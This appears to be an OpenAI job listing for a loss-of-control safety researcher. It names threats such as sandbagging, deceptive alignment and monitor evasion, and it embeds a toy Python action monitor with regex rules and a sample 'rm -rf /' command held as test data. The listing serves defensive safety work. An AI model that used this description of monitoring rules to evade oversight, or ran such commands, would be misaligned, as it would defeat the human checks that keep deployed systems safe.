Researcher, Loss of Control
OpenAI · San Francisco · Posted 10 March 2026
Job Description
ABOUT THE TEAM
The Safety Systems org ensures that OpenAI’s most capable models can be responsibly developed and deployed. We build evaluations, safeguards, and safety frameworks that help our models behave as intended in real-world settings.
The Preparedness team is an important part of the Safety Systems org (https://openai.com/safety/safety-systems) at OpenAI and is guided by OpenAI’s Preparedness Framework (https://openai.com/index/updating-our-preparedness-framework/).
Frontier AI models have the potential to benefit all of humanity, but they also pose increasingly severe risks. To ensure that AI promotes positive change, the Preparedness team readies OpenAI for the development of increasingly capable frontier models, and is tasked with identifying, tracking, and preparing for the catastrophic risks those models may pose.
The mission of the Preparedness team is to:
1. Closely monitor and predict the evolving capabilities of frontier AI systems, with an eye towards risks whose impact could be catastrophic
2. Ensure we have concrete procedures, infrastructure, and partnerships to mitigate these risks and to safely handle the development of powerful AI systems
Preparedness tightly connects capability assessment, evaluations, internal red teaming, and mitigations for frontier models, as well as overall coordination on AGI preparedness. This is fast-paced, exciting work with far-reaching importance for the company and for society.
ABOUT THE ROLE
As frontier AI systems become more capable, they are increasingly able to pursue long-horizon goals, use tools, adapt to feedback, and operate with greater autonomy. These advances create enormous potential benefits, but they also introduce the risk that models may behave in ways that are misaligned, deceptive, or difficult to supervise or contain. Reducing loss of control risk is therefore a core challenge for safely developing and deploying advanced AI systems.
As a Researcher for loss of control mitigations, you will help design and implement an end-to-end mitigation stack to reduce the risk of intentionally subversive or insufficiently controllable model behavior across OpenAI’s products and internal deployments. This role requires strong technical depth and close cross-functional collaboration to ensure safeguards are enforceable, scalable, and effective. You’ll contribute directly to building protections that remain robust as model capabilities, deployment patterns, and threat models evolve.
IN THIS ROLE, YOU WILL:
- Design and implement mitigation components for loss of control risk, spanning prevention, monitoring, detection, containment, and enforcement, under the guidance of senior technical and risk leadership (a minimal illustrative sketch of one such component appears after this list).
- Integrate safeguards across product and research surfaces in partnership with product, engineering, and research teams, helping ensure protections are consistent, low-latency, and resilient as usage and model autonomy increase.
- Evaluate technical trade-offs within the loss of control domain (coverage, robustness, latency, model utility, and operational complexity) and propose pragmatic, testable solutions.
- Collaborate closely with risk modeling, evaluations, and policy partners to align mitigation design with anticipated failure modes and high-severity threat scenarios, including deceptive alignment, hidden subgoals, reward hacking, and attempts to evade oversight.
- Execute rigorous testing and red-teaming workflows, helping stress-test the mitigation stack against increasingly capable and potentially subversive model behaviors—such as sandbagging, monitor evasion, exploit-seeking, unsafe tool use, or strategic deception—and iterate based on findings.
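To make the mitigation-stack framing above concrete, here is a minimal, purely illustrative Python sketch of one monitoring-and-containment component: a rule-based monitor that reviews a model's proposed tool calls and routes each to an allow, flag, or contain decision. Every name in it (ToolCall, Verdict, ActionMonitor) and every rule is a hypothetical assumption for illustration; nothing here reflects OpenAI's actual systems, and a production stack would rely on learned classifiers, context, and defense in depth rather than regexes.

"""Illustrative only: a toy action monitor in the spirit of the
prevention / monitoring / detection / containment stack described above.
All names (ToolCall, Verdict, ActionMonitor) are hypothetical and are
not part of any OpenAI API or internal system."""

from dataclasses import dataclass, field
from enum import Enum
import re


class Verdict(Enum):
    ALLOW = "allow"      # action proceeds unmodified
    FLAG = "flag"        # action proceeds but is logged for human review
    CONTAIN = "contain"  # action is blocked pending escalation


@dataclass
class ToolCall:
    """A model-proposed action: which tool, and with what arguments."""
    tool: str
    args: str


@dataclass
class ActionMonitor:
    """Scores proposed tool calls against simple pattern rules."""

    # Hypothetical patterns that warrant containment outright.
    contain_patterns: list = field(default_factory=lambda: [
        r"rm\s+-rf\s+/",                  # destructive filesystem command
        r"disable\s+(logging|monitor)",   # attempt to evade oversight
    ])
    # Hypothetical patterns that warrant flagging for review.
    flag_patterns: list = field(default_factory=lambda: [
        r"curl\s+http",                   # unexpected outbound network access
        r"ssh\s+",                        # lateral movement to other hosts
    ])

    def review(self, call: ToolCall) -> Verdict:
        text = f"{call.tool} {call.args}"
        if any(re.search(p, text) for p in self.contain_patterns):
            return Verdict.CONTAIN
        if any(re.search(p, text) for p in self.flag_patterns):
            return Verdict.FLAG
        return Verdict.ALLOW


if __name__ == "__main__":
    monitor = ActionMonitor()
    calls = [
        ToolCall("shell", "ls -la /tmp"),
        ToolCall("shell", "curl http://example.com/payload"),
        ToolCall("shell", "rm -rf / --no-preserve-root"),
    ]
    for call in calls:
        print(f"{call.tool} {call.args!r} -> {monitor.review(call).value}")

Running the script prints one verdict per proposed call. The point of the sketch is only the shape of the decision surface (prevent, detect, contain, escalate), not the rules themselves.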
YOU MIGHT THRIVE IN THIS ROLE IF YOU:
- Have a passion for AI safety and are motivated to make cutting-edge AI models safer for real-world use.
- Bring demonstrated experience with deep learning and transformer models.
- Are proficient with frameworks such ... (truncated, view full listing at source)